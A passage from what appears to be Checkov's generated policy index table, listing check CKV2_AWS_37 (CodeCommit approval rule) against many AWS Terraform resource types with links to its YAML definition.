aws_kms_ciphertext | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1200 | CKV2_AWS_37 | resource | aws_kms_external_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1201 | CKV2_AWS_37 | resource | aws_kms_grant | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1202 | CKV2_AWS_37 | resource | aws_kms_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1203 | CKV2_AWS_37 | resource | aws_lambda_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1204 | CKV2_AWS_37 | resource | aws_lambda_event_source_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1205 | CKV2_AWS_37 | resource | aws_lambda_function | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1206 | CKV2_AWS_37 | 
resource | aws_lambda_function_event_invoke_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1207 | CKV2_AWS_37 | resource | aws_lambda_layer_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1208 | CKV2_AWS_37 | resource | aws_lambda_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1209 | CKV2_AWS_37 | resource | aws_lambda_provisioned_concurrency_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1210 | CKV2_AWS_37 | resource | aws_launch_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1211 | CKV2_AWS_37 | resource | aws_launch_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1212 | CKV2_AWS_37 | resource | aws_lb | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1213 | CKV2_AWS_37 | resource | aws_lb_cookie_stickiness_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1214 | CKV2_AWS_37 | resource | aws_lb_listener | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1215 | CKV2_AWS_37 | resource | aws_lb_listener_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1216 | CKV2_AWS_37 | resource | aws_lb_listener_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1217 | CKV2_AWS_37 | resource | aws_lb_ssl_negotiation_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1218 | CKV2_AWS_37 | resource | aws_lb_target_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1219 | CKV2_AWS_37 | resource | aws_lb_target_group_attachment | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1220 | CKV2_AWS_37 | resource | aws_licensemanager_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1221 | CKV2_AWS_37 | resource | aws_licensemanager_license_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1222 | CKV2_AWS_37 | resource | aws_lightsail_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1223 | CKV2_AWS_37 | resource | aws_lightsail_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1224 | CKV2_AWS_37 | resource | aws_lightsail_key_pair | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1225 | CKV2_AWS_37 | resource | aws_lightsail_static_ip | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) 
| -| 1226 | CKV2_AWS_37 | resource | aws_lightsail_static_ip_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1227 | CKV2_AWS_37 | resource | aws_load_balancer_backend_server_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1228 | CKV2_AWS_37 | resource | aws_load_balancer_listener_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1229 | CKV2_AWS_37 | resource | aws_load_balancer_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1230 | CKV2_AWS_37 | resource | aws_macie_member_account_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1231 | CKV2_AWS_37 | resource | aws_macie_s3_bucket_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1232 | CKV2_AWS_37 | resource | aws_main_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1233 | CKV2_AWS_37 | resource | aws_media_convert_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1234 | CKV2_AWS_37 | resource | aws_media_package_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1235 | CKV2_AWS_37 | resource | aws_media_store_container | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1236 | CKV2_AWS_37 | resource | aws_media_store_container_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1237 | CKV2_AWS_37 | resource | aws_mq_broker | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1238 | CKV2_AWS_37 | resource | aws_mq_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1239 | CKV2_AWS_37 | resource | aws_msk_cluster | Ensure CodeCommit 
associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1240 | CKV2_AWS_37 | resource | aws_msk_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1241 | CKV2_AWS_37 | resource | aws_nat_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1242 | CKV2_AWS_37 | resource | aws_neptune_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1243 | CKV2_AWS_37 | resource | aws_neptune_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1244 | CKV2_AWS_37 | resource | aws_neptune_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1245 | CKV2_AWS_37 | resource | aws_neptune_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1246 | CKV2_AWS_37 | 
resource | aws_neptune_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1247 | CKV2_AWS_37 | resource | aws_neptune_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1248 | CKV2_AWS_37 | resource | aws_neptune_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1249 | CKV2_AWS_37 | resource | aws_network_acl | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1250 | CKV2_AWS_37 | resource | aws_network_acl_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1251 | CKV2_AWS_37 | resource | aws_network_interface | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1252 | CKV2_AWS_37 | resource | aws_network_interface_attachment | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1253 | CKV2_AWS_37 | resource | aws_network_interface_sg_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1254 | CKV2_AWS_37 | resource | aws_opsworks_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1255 | CKV2_AWS_37 | resource | aws_opsworks_custom_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1256 | CKV2_AWS_37 | resource | aws_opsworks_ganglia_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1257 | CKV2_AWS_37 | resource | aws_opsworks_haproxy_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1258 | CKV2_AWS_37 | resource | aws_opsworks_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1259 | CKV2_AWS_37 | resource | 
aws_opsworks_java_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1260 | CKV2_AWS_37 | resource | aws_opsworks_memcached_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1261 | CKV2_AWS_37 | resource | aws_opsworks_mysql_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1262 | CKV2_AWS_37 | resource | aws_opsworks_nodejs_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1263 | CKV2_AWS_37 | resource | aws_opsworks_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1264 | CKV2_AWS_37 | resource | aws_opsworks_php_app_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1265 | CKV2_AWS_37 | resource | aws_opsworks_rails_app_layer | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1266 | CKV2_AWS_37 | resource | aws_opsworks_rds_db_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1267 | CKV2_AWS_37 | resource | aws_opsworks_stack | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1268 | CKV2_AWS_37 | resource | aws_opsworks_static_web_layer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1269 | CKV2_AWS_37 | resource | aws_opsworks_user_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1270 | CKV2_AWS_37 | resource | aws_organizations_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1271 | CKV2_AWS_37 | resource | aws_organizations_organization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1272 | CKV2_AWS_37 | resource | 
aws_organizations_organizational_unit | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1273 | CKV2_AWS_37 | resource | aws_organizations_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1274 | CKV2_AWS_37 | resource | aws_organizations_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1275 | CKV2_AWS_37 | resource | aws_pinpoint_adm_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1276 | CKV2_AWS_37 | resource | aws_pinpoint_apns_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1277 | CKV2_AWS_37 | resource | aws_pinpoint_apns_sandbox_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1278 | CKV2_AWS_37 | resource | aws_pinpoint_apns_voip_channel | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1279 | CKV2_AWS_37 | resource | aws_pinpoint_apns_voip_sandbox_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1280 | CKV2_AWS_37 | resource | aws_pinpoint_app | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1281 | CKV2_AWS_37 | resource | aws_pinpoint_baidu_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1282 | CKV2_AWS_37 | resource | aws_pinpoint_email_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1283 | CKV2_AWS_37 | resource | aws_pinpoint_event_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1284 | CKV2_AWS_37 | resource | aws_pinpoint_gcm_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1285 | CKV2_AWS_37 | resource | aws_pinpoint_sms_channel 
| Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1286 | CKV2_AWS_37 | resource | aws_placement_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1287 | CKV2_AWS_37 | resource | aws_proxy_protocol_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1288 | CKV2_AWS_37 | resource | aws_qldb_ledger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1289 | CKV2_AWS_37 | resource | aws_quicksight_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1290 | CKV2_AWS_37 | resource | aws_quicksight_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1291 | CKV2_AWS_37 | resource | aws_ram_principal_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1292 | CKV2_AWS_37 | 
resource | aws_ram_resource_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1293 | CKV2_AWS_37 | resource | aws_ram_resource_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1294 | CKV2_AWS_37 | resource | aws_ram_resource_share_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1295 | CKV2_AWS_37 | resource | aws_rds_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1296 | CKV2_AWS_37 | resource | aws_rds_cluster_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1297 | CKV2_AWS_37 | resource | aws_rds_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1298 | CKV2_AWS_37 | resource | aws_rds_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1299 | CKV2_AWS_37 | resource | aws_rds_global_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1300 | CKV2_AWS_37 | resource | aws_redshift_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1301 | CKV2_AWS_37 | resource | aws_redshift_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1302 | CKV2_AWS_37 | resource | aws_redshift_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1303 | CKV2_AWS_37 | resource | aws_redshift_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | 